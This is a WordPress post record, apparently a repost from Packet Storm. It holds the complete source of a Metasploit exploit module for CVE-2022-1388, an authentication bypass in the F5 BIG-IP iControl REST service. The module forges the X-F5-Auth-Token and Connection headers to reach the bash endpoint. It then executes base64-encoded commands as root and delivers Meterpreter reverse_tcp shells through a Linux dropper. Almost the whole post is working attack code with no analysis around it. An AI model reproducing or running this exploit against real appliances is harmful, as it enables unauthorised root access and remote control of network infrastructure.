{"id":24371,"date":"2022-05-12T21:29:12","date_gmt":"2022-05-12T17:29:12","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167150\/f5_icontrol_rce.rb.txt"},"modified":"2022-05-15T09:37:34","modified_gmt":"2022-05-15T05:07:34","slug":"f5-big-ip-icontrol-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/f5-big-ip-icontrol-remote-code-execution\/","title":{"rendered":"F5 BIG-IP iControl Remote Code Execution"},"content":{"rendered":"

##
\n# This module requires Metasploit: https:\/\/metasploit.com\/download
\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
\n##<\/p>\n

class MetasploitModule < Msf::Exploit::Remote
\nRank = ExcellentRanking<\/p>\n

include Msf::Exploit::Remote::HttpClient
\ninclude Msf::Exploit::CmdStager
\nprepend Msf::Exploit::Remote::AutoCheck<\/p>\n

def initialize(info = {})
\nsuper(
\nupdate_info(
\ninfo,
\n‘Name’ => ‘F5 BIG-IP iControl RCE via REST Authentication Bypass’,
\n‘Description’ => %q{
\nThis module exploits an authentication bypass vulnerability
\nin the F5 BIG-IP iControl REST service to gain access to the
\nadmin account, which is capable of executing commands
\nthrough the \/mgmt\/tm\/util\/bash endpoint.<\/p>\n

Successful exploitation results in remote code execution
\nas the root user.
\n},
\n‘Author’ => [
\n‘Heyder Andrade’, # Metasploit module
\n‘alt3kx <alt3kx[at]protonmail.com>’, # PoC
\n‘James Horseman’, # Technical Writeup
\n‘Ron Bowes’ # Documentation of exploitation specifics
\n],
\n‘References’ => [
\n[‘CVE’, ‘2022-1388’],
\n[‘URL’, ‘https:\/\/support.f5.com\/csp\/article\/K23605346’],
\n[‘URL’, ‘https:\/\/www.horizon3.ai\/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive\/’], # Writeup
\n[‘URL’, ‘https:\/\/github.com\/alt3kx\/CVE-2022-1388_PoC’] # PoC
\n],
\n‘License’ => MSF_LICENSE,
\n‘DisclosureDate’ => ‘2022-05-04’, # Vendor advisory
\n‘Platform’ => [‘unix’, ‘linux’],
\n‘Arch’ => [ARCH_CMD, ARCH_X86, ARCH_X64],
\n‘Privileged’ => true,
\n‘Targets’ => [
\n[
\n‘Unix Command’,
\n{
\n‘Platform’ => ‘unix’,
\n‘Arch’ => ARCH_CMD,
\n‘Type’ => :unix_cmd,
\n‘DefaultOptions’ => {
\n‘PAYLOAD’ => ‘cmd\/unix\/python\/meterpreter\/reverse_tcp’
\n}
\n}
\n],
\n[
\n‘Linux Dropper’,
\n{
\n‘Platform’ => ‘linux’,
\n‘Arch’ => [ARCH_X86, ARCH_X64],
\n‘Type’ => :linux_dropper,
\n‘DefaultOptions’ => {
\n‘CMDSTAGER::FLAVOR’ => :bourne,
\n‘PAYLOAD’ => ‘linux\/x64\/meterpreter\/reverse_tcp’
\n}
\n}
\n]\n],
\n‘DefaultTarget’ => 1, # Linux Dropper avoids some timeout issues that Unix Command payloads sometimes encounter.
\n‘DefaultOptions’ => {
\n‘RPORT’ => 443,
\n‘SSL’ => true,
\n‘PrependFork’ => true, # Needed to avoid warnings about timeouts and potential failures across attempts.
\n‘MeterpreterTryToFork’ => true # Needed to avoid warnings about timeouts and potential failures across attempts.
\n},
\n‘Notes’ => {
\n‘Stability’ => [CRASH_SAFE],
\n‘Reliability’ => [REPEATABLE_SESSION], # Only one concurrent session
\n‘SideEffects’ => [
\nIOC_IN_LOGS, # \/var\/log\/restjavad.0.log (rotated)
\nARTIFACTS_ON_DISK # CmdStager
\n]\n}
\n)
\n)<\/p>\n

register_options(
\n[
\nOptString.new(‘TARGETURI’, [true, ‘The base path to the iControl installation’, ‘\/’]),
\nOptString.new(‘HttpUsername’, [true, ‘iControl username’, ‘admin’]),
\nOptString.new(‘HttpPassword’, [true, ‘iControl password’, ”])
\n]\n)
\nregister_advanced_options([
\nOptFloat.new(‘CmdExecTimeout’, [true, ‘Command execution timeout’, 3.5])
\n])
\nend<\/p>\n

def check
\nprint_status(“Checking #{datastore[‘RHOST’]}:#{datastore[‘RPORT’]}”)
\nres = send_request_cgi({
\n‘uri’ => normalize_uri(target_uri.path, ‘\/mgmt\/shared\/authn\/login’),
\n‘method’ => ‘GET’
\n})<\/p>\n

return CheckCode::Unknown unless res&.code == 401<\/p>\n

body = res.get_json_document<\/p>\n

return CheckCode::Safe unless body.key?(‘message’) && body[‘kind’] == ‘:resterrorresponse’<\/p>\n

signature = Rex::Text.rand_text_alpha(13)
\nstub = “echo #{signature}”
\nres = send_command(stub)
\nreturn CheckCode::Safe unless res&.code == 200<\/p>\n

body = res.get_json_document<\/p>\n

return CheckCode::Safe unless body[‘kind’] == ‘tm:util:bash:runstate’<\/p>\n

return CheckCode::Vulnerable if body[‘commandResult’].chomp == signature<\/p>\n

CheckCode::Safe
\nend<\/p>\n

def exploit
\nprint_status(“Executing #{target.name} for #{datastore[‘PAYLOAD’]}”)<\/p>\n

case target[‘Type’]\nwhen :unix_cmd
\nexecute_command(payload.encoded)
\nwhen :linux_dropper
\nexecute_cmdstager
\nend
\nend<\/p>\n

def execute_command(cmd, _opts = {})
\nvprint_status(“Executing command: #{cmd}”)<\/p>\n

res = send_command(cmd)
\nunless res
\nprint_warning(‘Command execution timed out’)
\nreturn
\nend<\/p>\n

json = res.get_json_document<\/p>\n

unless res.code == 200 && json[‘kind’] == ‘tm:util:bash:runstate’
\nfail_with(Failure::PayloadFailed, ‘Failed to execute command’)
\nend<\/p>\n

print_good(‘Successfully executed command’)<\/p>\n

return unless (cmd_result = json[‘commandResult’])<\/p>\n

vprint_line(cmd_result)
\nend<\/p>\n

def send_command(cmd)
\nbash_cmd = “eval $(echo #{Rex::Text.encode_base64(cmd)} | base64 -d)”
\nsend_request_cgi({
\n‘method’ => ‘POST’,
\n‘uri’ => normalize_uri(target_uri.path, ‘\/mgmt\/tm\/util\/bash’),
\n‘ctype’ => ‘application\/json’,
\n‘authorization’ => basic_auth(datastore[‘HttpUsername’], datastore[‘HttpPassword’]),
\n‘headers’ => {
\n‘Host’ => ‘localhost’,
\n‘Connection’ => ‘keep-alive, X-F5-Auth-Token’,
\n‘X-F5-Auth-Token’ => Rex::Text.rand_text_alpha_lower(6)
\n},
\n‘data’ => {
\n‘command’ => ‘run’,
\n‘utilCmdArgs’ => “-c ‘#{bash_cmd}'”
\n}.to_json
\n}, datastore[‘CmdExecTimeout’])
\nend
\nend<\/p>\n","protected":false},"excerpt":{"rendered":"

## # This module requires Metasploit: https:\/\/metasploit.com\/download # Current source: https:\/\/github.com\/rapid7\/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, ‘Name’ => ‘F5 BIG-IP iControl RCE via REST Authentication Bypass’, ‘Description’ => %q{ This module exploits an authentication bypass vulnerability in the F5 …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-24371","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/24371","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=24371"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/24371\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=24371"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=24371"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=24371"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}